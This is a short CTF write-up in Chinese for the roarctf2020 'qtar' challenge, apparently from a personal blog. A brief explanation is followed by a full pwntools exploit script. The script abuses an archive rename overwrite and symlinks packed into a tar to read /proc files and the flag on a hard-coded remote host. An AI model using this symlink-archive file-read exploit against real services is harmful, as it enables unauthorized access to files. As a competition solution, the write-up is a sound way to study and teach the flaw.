ha1vk's blog
0%

roarctf2020_qtar

发表于 分类于

通过盲打测试,可以发现在compress的rename时,可以覆盖掉已经存在的文件,这样,我们就可以使得我们自己上传的文件被打上标记,从而能够对我们上传的压缩包进行解压,通过提示功能知道flag在/home/ctf/flag,于是考虑在本地制造一个软链接文件,然后压缩成tar,这样在远程解压时链接上。然后我们就可以读取文件内容了,发现/home路径被ban了。于是先读取/proc/self/status,得到父进程的pid,这样,我们就可以通过/proc/{ppid}/cwd去访问/home/ctf目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#coding:utf8
from pwn import *
import os
sh = remote('47.104.178.87',35360)

def upload(content):
   sh.sendlineafter('>','u')
   sh.sendlineafter('Content:',content)
   sh.recvuntil('File uploaded as /tmp/')
   return sh.recvuntil('\n',drop = True)

def compress(name,rename=''):
   sh.sendlineafter('>','c')
   sh.sendlineafter('Filename: /tmp/',name)
   if rename == '':
      sh.sendlineafter('Rename archive file? [y/N]','N')
   else:
      sh.sendlineafter('Rename archive file? [y/N]','y')
      print 'rename',rename
      sh.sendlineafter('Arcname:',rename)
   sh.recvuntil('File compressed as ')
   return sh.recvuntil('\n',drop = True)

def extract(name):
   sh.sendlineafter('>','x')
   sh.sendlineafter('Filename:',name)

def readf(name):
   sh.sendlineafter('>','r')
   sh.sendlineafter('Filename:',name)

def watch(file):
   os.system('rm -r ff')
   os.system('ln -s {} ff'.format(file))
   os.system('tar -cvpf ff.tar ff')

   f = open('ff.tar','rb')
   content = f.read()
   f.close()
   a = upload(content)

   b = upload('haivk')
   b_c = compress(b)

   a_c = compress(a,b_c)
   extract(a_c)

   #解压我们自己上传的tar文件
   extract(b_c)

   #改变权限
   compress(a,'ff')
   readf('ff')

#context.log_level = 'debug'
watch('/proc/self/status')
sh.recvuntil('PPid:')
ppid = int(sh.recvuntil('\n',drop = True))
print ppid
watch('/proc/{}/cwd/flag'.format(ppid))

sh.interactive()